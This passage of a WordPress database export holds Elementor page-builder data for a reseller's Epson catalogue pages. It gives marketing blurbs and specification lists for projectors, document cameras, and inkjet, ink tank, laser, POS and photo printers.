table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(7797,3457,'_elementor_version','2.5.14'),(7800,3458,'_wp_page_template','template-fullwidth.php'),(7801,3458,'_elementor_edit_mode','builder'),(7802,3458,'_elementor_template_type','post'),(7803,3458,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson AcuLaser C9300N<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2424\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><\\/p><p>The Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Speed: Up to 30ppm<\\/li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li><li>Quality prints with new Epson Technologies<\\/li><li>New print job management features<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2426\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><\\/p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 35ppm<\\/li><li>Auto-Duplex<\\/li><li>Ethernet &amp; Epson iPrint<\\/li><li>2 optional paper cassette tray<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2427\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><\\/p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 40 ppm<\\/li><li>Epson iPrint<\\/li><li>Ethernet<\\/li><li>4 optional cassette trays<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2428\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T88V-i\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.<\\/p><ul><li>Printing speed of up to 300mm\\/second<\\/li><li>20 million lines for printer mechanism<\\/li><li>Up to 2 million for auto-cutter<\\/li><li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li><li>Control peripherals easily<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T70II\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><\\/p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L850 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L805 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded 